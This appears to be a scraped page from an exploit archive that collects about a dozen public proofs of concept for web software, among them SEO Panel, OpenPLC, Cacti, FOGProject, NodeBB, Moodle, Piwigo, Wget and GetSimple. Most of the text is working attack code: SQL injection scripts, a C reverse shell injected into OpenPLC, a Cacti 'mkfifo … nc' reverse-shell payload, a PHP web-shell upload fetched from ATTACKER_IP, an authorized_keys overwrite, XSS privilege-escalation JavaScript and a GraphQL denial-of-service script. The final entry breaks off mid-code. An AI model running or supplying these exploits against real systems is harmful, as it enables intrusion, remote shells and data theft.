ISHACK AI BOT

# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2) # Author: nu11secur1ty # Testing and Debugging: nu11secur1ty # Date: 04/25/2021 # Vendor: https://www.seopanel.org/ # Link: https://www.seopanel.org/spdownload/4.8.0 # CVE: CVE-2021-28419 [+] Exploit Source: #!/usr/bin/python3 # Author: @nu11secur1ty # CVE-2021-28419 from selenium import webdriver import time #enter the link to the website you want to automate login. website_link="http://192.168.1.3/seopanel/login.php" #enter your login username username="spadmin" #enter your login password password="spadmin" #enter the element for username input field element_for_username="userName" #enter the element for password input field element_for_password="password" #enter the element for submit button element_for_submit="login" browser = webdriver.Chrome() browser.get((website_link)) try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) signInButton = browser.find_element_by_name(element_for_submit) signInButton.click() # Exploit browser.get((" http://192.168.1.3/seopanel/archive.php?from_time=2021-04-25&order_col=(SELECT 7397 FROM (SELECT(SLEEP(15)))nu11secur1ty)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id=1")) print("payload is deployed MySQL is not responding correctly...\n") except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(")

# Exploit Title: OpenPLC 3 - Remote Code Execution (Authenticated) # Date: 25/04/2021 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://www.openplcproject.com/ # Software Link: https://github.com/thiagoralves/OpenPLC_v3 # Version: OpenPLC v3 # Tested on: Ubuntu 16.04,Debian 9,Debian 10 Buster #/usr/bin/python3 import requests import sys import time import optparse import re parser = optparse.OptionParser() parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)") parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login") parser.add_option('-p', '--passw', action="store", dest="passw", help="Pass credential to login") parser.add_option('-i', '--rip', action="store", dest="rip", help="IP for Reverse Connection") parser.add_option('-r', '--rport', action="store", dest="rport", help="Port for Reverse Connection") options, args = parser.parse_args() if not options.url: print('[+] Remote Code Execution on OpenPLC_v3 WebServer') print('[+] Specify an url target') print("[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444") exit() host = options.url login = options.url + '/login' upload_program = options.url + '/programs' compile_program = options.url + '/compile-program?file=681871.st' run_plc_server = options.url + '/start_plc' user = options.user password = options.passw rev_ip = options.rip rev_port = options.rport x = requests.Session() def auth(): print('[+] Remote Code Execution on OpenPLC_v3 WebServer') time.sleep(1) print('[+] Checking if host '+host+' is Up...') host_up = x.get(host) try: if host_up.status_code == 200: print('[+] Host Up! ...') except: print('[+] This host seems to be down :( ') sys.exit(0) print('[+] Trying to authenticate with credentials '+user+':'+password+'') time.sleep(1) submit = { 'username': user, 'password': password } x.post(login, data=submit) response = x.get(upload_program) if len(response.text) > 30000 and response.status_code == 200: print('[+] Login success!') time.sleep(1) else: print('[x] Login failed :(') sys.exit(0) def injection(): print('[+] PLC program uploading... ') upload_url = host + "/upload-program" upload_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvgPw.qwEcF3rMliGcTgQ4zI4RInBZrqE"} upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------210749863411176965311768214500", "Origin": host, "Connection": "close", "Referer": host + "/programs", "Upgrade-Insecure-Requests": "1"} upload_data = "-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"file\"; filename=\"program.st\"\r\nContent-Type: application/vnd.sailingtracker.track\r\n\r\nPROGRAM prog0\n VAR\n var_in : BOOL;\n var_out : BOOL;\n END_VAR\n\n var_out := var_in;\nEND_PROGRAM\n\n\nCONFIGURATION Config0\n\n RESOURCE Res0 ON PLC\n TASK Main(INTERVAL := T#50ms,PRIORITY := 0);\n PROGRAM Inst0 WITH Main : prog0;\n END_RESOURCE\nEND_CONFIGURATION\n\r\n-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload Program\r\n-----------------------------210749863411176965311768214500--\r\n" upload = x.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data) act_url = host + "/upload-program-action" act_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------374516738927889180582770224000", "Origin": host, "Connection": "close", "Referer": host + "/upload-program", "Upgrade-Insecure-Requests": "1"} act_data = "-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_name\"\r\n\r\nprogram.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_descr\"\r\n\r\n\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_file\"\r\n\r\n681871.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"epoch_time\"\r\n\r\n1617682656\r\n-----------------------------374516738927889180582770224000--\r\n" upload_act = x.post(act_url, headers=act_headers, data=act_data) time.sleep(2) def connection(): print('[+] Attempt to Code injection...') inject_url = host + "/hardware" inject_dash = host + "/dashboard" inject_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvyFA.2NQ7ZYcNZ74ci2miLkefHCai2Fk"} inject_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------289530314119386812901408558722", "Origin": host, "Connection": "close", "Referer": host + "/hardware", "Upgrade-Insecure-Requests": "1"} inject_data = "-----------------------------289530314119386812901408558722\r\nContent-Disposition: form-data; name=\"hardware_layer\"\r\n\r\nblank_linux\r\n-----------------------------289530314119386812901408558722\r\nContent-Disposition: form-data; name=\"custom_layer_code\"\r\n\r\n#include \"ladder.h\"\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nint ignored_bool_inputs[] = {-1};\r\nint ignored_bool_outputs[] = {-1};\r\nint ignored_int_inputs[] = {-1};\r\nint ignored_int_outputs[] = {-1};\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nvoid initCustomLayer()\r\n{\r\n \r\n \r\n \r\n}\r\n\r\n\r\nvoid updateCustomIn()\r\n{\r\n\r\n}\r\n\r\n\r\nvoid updateCustomOut()\r\n{\r\n int port = "+rev_port+";\r\n struct sockaddr_in revsockaddr;\r\n\r\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\r\n revsockaddr.sin_family = AF_INET; \r\n revsockaddr.sin_port = htons(port);\r\n revsockaddr.sin_addr.s_addr = inet_addr(\""+rev_ip+"\");\r\n\r\n connect(sockt, (struct sockaddr *) &revsockaddr, \r\n sizeof(revsockaddr));\r\n dup2(sockt, 0);\r\n dup2(sockt, 1);\r\n dup2(sockt, 2);\r\n\r\n char * const argv[] = {\"/bin/sh\", NULL};\r\n execve(\"/bin/sh\", argv, NULL);\r\n\r\n return 0; \r\n \r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------289530314119386812901408558722--\r\n" inject = x.post(inject_url, headers=inject_headers, cookies=inject_cookies, data=inject_data) time.sleep(3) comp = x.get(compile_program) time.sleep(6) x.get(inject_dash) time.sleep(3) print('[+] Spawning Reverse Shell...') start = x.get(run_plc_server) time.sleep(1) if start.status_code == 200: print('[+] Reverse connection receveid!') sys.exit(0) else: print('[+] Failed to receive connection :(') sys.exit(0) auth() injection() connection()

# Exploit Title: Kimai 1.14 - CSV Injection # Date: 26/04/2021 # Exploit Author: Mohammed Aloraimi # Vendor Homepage: https://www.kimai.org/ # Software Link: https://github.com/kevinpapst/kimai2 # Version: 1.14 <https://github.com/kevinpapst/kimai2/releases/tag/1.14> # Payload: @SUM(1+9)*cmd|' /C calc'!A0 # Tested on: Win10x64 # Proof Of Concept: CSV Injection (aka Excel Macro Injection or Formula Injection) exists in creating new timesheet in Kimai. By filling the Description field with malicious payload, it will be mistreated while exporting to a CSV file. To exploit this vulnerability: 1- Login as user. 2- Create new timesheet. 3- Fill the description with the malicious payload. 4- Save the timesheet. 5- Export it via CSV. 6- Open the CSV file, allow all popups and our payload is executed(calculator is opened).

# Exploit Title: Montiorr 1.7.6m - Persistent Cross-Site Scripting # Date: 25/4/2021 # Exploit Author: Ahmad Shakla # Software Link: https://github.com/Monitorr/Monitorr # Tested on: Kali GNU/Linux 2020.2 # Detailed Bug Description : https://arabcyberclub.blogspot.com/2021/04/monitor-176m-file-upload-to-xss.html An attacker can preform an XSS attack via image upload Steps : 1)Create a payload with the following format : ><img src=x onerror=alert("XSS")>.png 2) Install the database by going to the following link : https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/_install.php 3)Register for a new account on the server by going to the following link : https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php?action=register 4)Login with your credentials on the following link : https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php 5)Go to the following link and upload the payload : https://monitorr.robyns-petshop.thm/settings.php#services-configuration

# Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service # Author: Dolev Farhi # Date: 2021-04-12 # Vendor Homepage: https://www.wpgraphql.com/ # Version: 1.3.5 # Tested on: Ubuntu """ This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors. """ import sys import requests def usage(): print('* WordPress GraphQL 1.3.5 Denial of Service *') print('python {} <wordpress_url> <number_of_field_duplications> <number_of_chained_queries>'.format(sys.argv[0])) print('python {} http://site.com 10000 100'.format(sys.argv[0])) sys.exit(1) if len(sys.argv) < 4: print('Missing arguments!') usage() def wpgql_exists(): try: r = requests.post(WORDPRESS_URL, json='x') if 'GraphQL' in r.json()['errors'][0]['message']: return True except: pass return False # This PoC assumes graphql is located at index.php?graphql WORDPRESS_URL = sys.argv[1] + '/index.php?graphql' FORCE_MULTIPLIER = int(sys.argv[2]) CHAINED_REQUESTS = int(sys.argv[3]) if wpgql_exists is False: print('Could not identify GraphQL running at "/index.php?graphql"') sys.exit(1) queries = [] payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'} for _ in range(0, CHAINED_REQUESTS): queries.append(query) r = requests.post(WORDPRESS_URL, json=queries) print('Time took: {} seconds '.format(r.elapsed.total_seconds())) print('Response:', r.json())

# Exploit Title: Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS) # Date: 21-04-2021 # Exploit Author: Sreenath Raghunathan # Vendor Homepage: https://getkirby.com/ # Software Link: https://github.com/getkirby/kirby # Version: 3.5.3.1(REQUIRED) # CVE : CVE-2021-29460 POST /api/users/<userid>/avatar HTTP/1.1 Host: <host> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-CSRF: <redacted> Content-Type: multipart/form-data; boundary=---------------------------286121627839893676321700902916 Content-Length: 563 Connection: close Cookie: <redacted> -----------------------------286121627839893676321700902916 Content-Disposition: form-data; name="file"; filename="svgxss.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,500 500,0" fill="#009900" stroke="#004400"/> "><script>alert(1)</script> </svg> -----------------------------286121627839893676321700902916--

# Exploit Title: FOGProject 1.5.9 - File Upload RCE (Authenticated) # Date: 2021-04-28 # Exploit Author: [email protected] # Vendor Homepage: https://fogproject.org # Software Link: https://github.com/FOGProject/fogproject/archive/1.5.9.zip # Tested on: Debian 10 On the Attacker Machine: 1) Create an empty 10Mb file. dd if=/dev/zero of=myshell bs=10485760 count=1 2) Add your PHP code to the end of the file created in the step 1. echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell 3) Put the file "myshell" accessible through HTTP. $ cp myshell /var/www/html 4) Encode the URL to get "myshell" file to base64 (Replacing Attacker IP). $ echo "http://ATTACKER_IP/myshell" | base64 aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo= 5) Visit http://VICTIM_IP/fog/management/index.php?node=about&sub=kernel&file=<YOUR_MYSHELL_URL_HERE>=&arch=arm64 Example: http://192.168.1.120/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=&arch=arm64 6) Appears a textbox, change the Kernel Name (bzImage32) to myshell.php and click on Install. 7) Visit http://VICTIM_IP/fog/service/ipxe/myshell.php?cmd=hostname

# Exploit Title: Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution # Date: 04/28/2021 # Exploit Author: Leonardo Paiva # Vendor Homepage: https://www.cacti.net/ # Software Link: https://www.cacti.net/downloads/cacti-1.2.12.tar.gz # Version: 1.2.12 # Tested on: Ubuntu 20.04 # CVE : CVE-2020-14295 # Credits: @M4yFly (https://twitter.com/M4yFly) # References: # https://github.commandcom/Cacti/cacti/issues/3622 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14295 #!/usr/bin/python3 import argparse import requests import sys import urllib.parse from bs4 import BeautifulSoup # proxies = {'http': 'http://127.0.0.1:8080'} def login(url, username, password, session): print("[+] Connecting to the server...") get_token_request = session.get(url + "/cacti/index.php", timeout=5) #, proxies=proxies) print("[+] Retrieving CSRF token...") html_content = get_token_request.text soup = BeautifulSoup(html_content, 'html.parser') csrf_token = soup.find_all('input')[0].get('value').split(';')[0] if csrf_token: print(f"[+] Got CSRF token: {csrf_token}") print("[+] Trying to log in...") data = { '__csrf_magic': csrf_token, 'action': 'login', 'login_username': username, 'login_password': password } login_request = session.post(url + "/cacti/index.php", data=data) #, proxies=proxies) if "Invalid User Name/Password Please Retype" in login_request.text: print("[-] Unable to log in. Check your credentials") sys.exit() else: print("[+] Successfully logged in!") else: print("[-] Unable to retrieve CSRF token!") sys.exit() def exploit(lhost, lport, session): rshell = urllib.parse.quote(f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f") payload = f"')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value='{rshell};'+where+name='path_php_binary';--+-" exploit_request = session.get(url + f"/cacti/color.php?action=export&header=false&filter=1{payload}") #, proxies=proxies) print("\n[+] SQL Injection:") print(exploit_request.text) try: session.get(url + "/cacti/host.php?action=reindex", timeout=1) #, proxies=proxies) except Exception: pass print("[+] Check your nc listener!") if __name__ == '__main__': parser = argparse.ArgumentParser(description='[*] Cacti 1.2.12 - SQL Injection / Remote Code Execution') parser.add_argument('-t', metavar='<target/host URL>', help='target/host URL, example: http://192.168.15.58', required=True) parser.add_argument('-u', metavar='<user>', help='user to log in', required=True) parser.add_argument('-p', metavar='<password>', help="user's password", required=True) parser.add_argument('--lhost', metavar='<lhost>', help='your IP address', required=True) parser.add_argument('--lport', metavar='<lport>', help='your listening port', required=True) args = parser.parse_args() url = args.t username = args.u password = args.p lhost = args.lhost lport = args.lport session = requests.Session() login(url, username, password, session) exploit(lhost, lport, session)

# Exploit Title: NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write # Date: 2021-02-01 # Exploit Author: 1F98D # Software Link: https://nodebb.org/ # Version: Emoji for NodeBB <= v3.2.1 # Tested on: Ubuntu 18.04 (x86) # Software Link: https://github.com/NodeBB/nodebb-plugin-emoji # # The Emoji for NodeBB which is installed by default contains an # arbitrary file write vulnerability to insecurely handled user controlled # input. # # This exploit requires administrative access to the NodeBB instance in order # to access the emoji upload API. # #!/usr/bin/python3 import requests import sys import re TARGET = 'http://192.168.1.1:4567' USERNAME = 'admin' PASSWORD = 'password' DESTINATION_FILE = '/root/.ssh/authorized_keys' SOURCE_FILE = '/home/kali/.ssh/id_rsa.pub' headers = { 'User-Agent': 'NotPython' } s = requests.Session() r = s.get('{}/login'.format(TARGET), headers=headers) if r.status_code != 200: print('[!] Error, {}/login unavailable'.format(TARGET)) sys.exit(1) csrf = re.search('name="_csrf" value="(.+)?" />', r.text, re.IGNORECASE) if csrf is None: print('[!] Could not extract csrf token to proceed.') sys.exit(1) auth = { 'username': USERNAME, 'password': PASSWORD, '_csrf': csrf.group(1) } r = s.post('{}/login'.format(TARGET), headers=headers, data=auth) if r.status_code != 200: print('[!] Error, login failed') print('[!] Status: {}'.format(r.status_code)) print('[!] Response: {}'.format(r.text)) sys.exit(1) print('[+] Login successful') r = s.get('{}/admin/plugins/emoji'.format(TARGET), headers=headers) if r.status_code != 200: print('[!] Error, could not access emoji plugin') print('[!] Status: {}'.format(r.status_code)) print('[!] Response: {}'.format(r.text)) sys.exit(1) print('[+] Emoji plugin is installed') files = { 'emojiImage': open(SOURCE_FILE) } data = { 'fileName': '../../../../../../..{}'.format(DESTINATION_FILE) } r = s.post('{}/api/admin/plugins/emoji/upload'.format(TARGET), headers=headers, data=data, files=files) if r.status_code != 200: print('[!] Error, could not upload file') print('[!] Status: {}'.format(r.status_code)) print('[!] Response: {}'.format(r.text)) sys.exit(1) print('[+] Successfully uploaded file')

# Exploit Title: Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS) # Date: 04/2021 # Exploit Author: farisv # Vendor Homepage: https://moodle.org/ # Software Link: https://download.moodle.org https://github.com/moodle/moodle/archive/refs/tags/v3.6.1.zip # Version: Moodle < 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16 # CVE: CVE-2019-3810 Moodle is a learning platform designed to provide educators, administrators, and learners with a single robust, secure and integrated system to create personalised learning environments. The following is PoC to use the XSS bug on /userpix/ (CVE-2019-3810) for privilege escalation from student to administrator. 1. Upload the XSS payload [1] to pastebin or other similar service. Change the value of userid to your own id. Let's say the URL is https://pastebin.com/raw/xxxxxxxx. 2. Login to your student account. 3. Set first name with: " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement 4. Set surname with: ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS') 5. Ask the administrator to open /userpix/ page or put the link to that page on your post and wait. If successful, your account will be added as administrator. See the demonstration video on https://github.com/farisv/Moodle-CVE-2019-3810 [1] XSS Payload for privilege escalation on Moodle. Change the value of userid to your id. var webroot = '/'; var userid = '3'; var sesskey = ''; function get(path, success) { var xhr = new XMLHttpRequest(); xhr.open('GET', webroot + path); xhr.onreadystatechange = function() { if (xhr.readyState > 3 && xhr.status == 200) { success(xhr.responseText); } }; xhr.send(); return xhr; } function post(path, data, success) { var xhr = new XMLHttpRequest(); xhr.open('POST', webroot + path); xhr.onreadystatechange = function() { if (xhr.readyState > 3 && xhr.status == 200) { success(xhr.responseText); } }; xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send(encodeURI(data)); return xhr; } function setAdmin() { // Assign administrator access to userid bpath = 'admin/roles/admins.php'; data = "confirmadd=" + userid + "&sesskey=" + sesskey; post(bpath, data, function(data){}); } function getSesskey(data) { var sesskey_find = data.indexOf('"sesskey":"'); sesskey = data.substr(sesskey_find + 11, 10); setAdmin(); } function payload() { // We can find Sesskey inside JS script in main page get('', getSesskey); } // Start payload();

# Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2) # Original Exploit Author: Dawid Golunski # Exploit Author: liewehacksie # Version: GNU Wget < 1.18 # CVE: CVE-2016-4971 import http.server import socketserver import socket import sys class wgetExploit(http.server.SimpleHTTPRequestHandler): def do_GET(self): # This takes care of sending .wgetrc/.bash_profile/$file print("We have a volunteer requesting " + self.path + " by GET :)\n") if "Wget" not in self.headers.get('User-Agent'): print("But it's not a Wget :( \n") self.send_response(200) self.end_headers() self.wfile.write("Nothing to see here...") return self.send_response(301) print("Uploading " + str(FILE) + "via ftp redirect vuln. It should land in /home/ \n") new_path = 'ftp://anonymous@{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE) print("Sending redirect to %s \n"%(new_path)) self.send_header('Location', new_path) self.end_headers() HTTP_LISTEN_IP = '192.168.72.2' HTTP_LISTEN_PORT = 80 FTP_HOST = '192.168.72.4' FTP_PORT = 2121 FILE = '.bash_profile' handler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit) print("Ready? Is your FTP server running?") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((FTP_HOST, FTP_PORT)) if result == 0: print("FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)) else: print("FTP is down :( Exiting.") exit(1) print("Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT) handler.serve_forever()

# Exploit Title: Piwigo 11.3.0 - 'language' SQL # Author: @nu11secur1ty # Testing and Debugging: nu11secur1ty # Date: 04.30.2021 # Vendor: https://piwigo.org/ # Link: https://github.com/Piwigo/Piwigo/releases/tag/11.3.0 # CVE: CVE-2021-27973 [+] Exploit Source: #!/usr/bin/python3 # Author: @nu11secur1ty # Debug: @nu11secur1ty # CVE-2021-27973 from selenium import webdriver import time #enter the link to the website you want to automate login. website_link="http://192.168.1.3/piwigo/" #enter your login username username="admin" #enter your login password password="password" #enter the element for username input field element_for_username="username" #enter the element for password input field element_for_password="password" #enter the element for submit button element_for_submit="login" print("Loading... ;)") time.sleep(1) browser = webdriver.Chrome() browser.get((website_link)) try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) signInButton = browser.find_element_by_name(element_for_submit) signInButton.click() # Languages Exploit time.sleep(5) browser.get((" http://192.168.1.3/piwigo/admin.php?page=languages&language=TR_CN%27%20or%20updatexml(1%2Cconcat(0x7e%2C(version()))%2C0)%20or%20%27&action=activate")) print("The payload for category Languages is deployed...\n") except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(")

# Exploit Title: Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection) # Date: 02/05/2021 # Exploit Author: Syed Sheeraz Ali # Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows 10 20H2 + XAMPP v3.2.4 If we try to login as a voter and catch the login request in burp then pass it to sql map then we can put our payload in voter parameter Vulnerable code ``` Path :- /votersystem/login.php <?php session_start(); include 'includes/conn.php'; if(isset($_POST['login'])){ $voter = $_POST['voter']; <- vulnerable parameter $password = $_POST['password']; $sql = "SELECT * FROM voters WHERE voters_id = '$voter'"; <- Passed unsanitized input $query = $conn->query($sql); if($query->num_rows < 1){ $_SESSION['error'] = 'Cannot find voter with the ID'; } else{ $row = $query->fetch_assoc(); if(password_verify($password, $row['password'])){ $_SESSION['voter'] = $row['id']; } else{ $_SESSION['error'] = 'Incorrect password'; } } } else{ $_SESSION['error'] = 'Input voter credentials first'; } header('location: index.php'); ?> ``` Request ``` POST /login.php HTTP/1.1 Host: 10.129.139.200 Content-Length: 27 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://10.129.139.200 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-GPC: 1 Referer: http://10.129.139.200/ Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=vuukl0gemht1iiq7lmptu7npoe Connection: close voter=as&password=as&login= ``` Sqlmap output ``` python3 sqlmap.py --dbms=mysql --batch --level=1 --risk=3 -r /Users/sheerazali/Documents/wpcve/voter.req -p voter ___ __H__ ___ ___[)]_____ ___ ___ {1.5.4.7#dev} |_ -| . [(] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 07:50:56 /2021-05-02/ [07:50:56] [INFO] parsing HTTP request from '/Users/sheerazali/Documents/wpcve/voter.req' [07:50:57] [INFO] testing connection to the target URL got a 302 redirect to 'http://10.129.139.200:80/index.php'. Do you want to follow? [Y/n] Y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y sqlmap resumed the following injection point(s) from stored session: --- Parameter: voter (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: voter=as' AND (SELECT 2487 FROM (SELECT(SLEEP(5)))WYpt) AND 'hBVQ'='hBVQ&password=as&login= --- [07:50:57] [INFO] testing MySQL do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y [07:51:08] [INFO] confirming MySQL [07:51:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [07:51:19] [INFO] adjusting time delay to 1 second due to good response times [07:51:19] [INFO] the back-end DBMS is MySQL web application technology: PHP 7.3.27, Apache 2.4.46 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [07:51:19] [INFO] fetched data logged to text files under '/Users/sheerazali/.local/share/sqlmap/output/10.129.139.200' [*] ending @ 07:51:19 /2021-05-02/ ```

# Exploit Title: GetSimple CMS Custom JS 0.1 - CSRF to XSS to RCE # Exploit Author: Bobby Cooke (boku) & Abhishek Joshi # Date: 30/04/201 # Vendor Homepage: http://get-simple.info # Software Link: http://get-simple.info/download/ & http://get-simple.info/extend/plugin/custom-js/1267/ # Vendor: 4Enzo # Version: v0.1 # Tested against Server Host: Windows 10 Pro + XAMPP # Tested against Client Browsers: Firefox (Linux & Windows) & Internet Explorer # Vulnerability Description: # The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website. # Full Disclosure & MITRE CVE Tracking: github.com/boku7/gsCMS-CustomJS-Csrf2Xss2Rce # CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H # CVSS Base Score: 9.6 import argparse,requests from http.server import BaseHTTPRequestHandler, HTTPServer from colorama import (Fore as F, Back as B, Style as S) from threading import Thread from time import sleep FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT def bullet(char,color): C=FB if color == 'B' else FR if color == 'R' else FG return SB+C+'['+ST+SB+char+SB+C+']'+ST+' ' info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G') class theTHREADER(object): def __init__(self, interval=1): self.interval = interval thread = Thread(target=self.run, args=()) thread.daemon = True thread.start() def run(self): run() def webshell(target): try: websh = "{}/webshell.php".format(target,page) term = "{}{}PWNSHELL{} > {}".format(SB,FR,FB,ST) welcome = ' {}{}]{}+++{}[{}========>{} HelloFriend {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST) print(welcome) while True: specialmove = input(term) command = {'FierceGodKick': specialmove} r = requests.post(websh, data=command, verify=False) status = r.status_code if status != 200: r.raise_for_status() response = r.text print(response) except: pass def xhrRcePayload(): payload = 'var e=function(i){return encodeURIComponent(i);};' payload += 'var gt = decodeURIComponent("%3c");' payload += 'var lt = decodeURIComponent("%3e");' payload += 'var h="application/x-www-form-urlencoded";' payload += 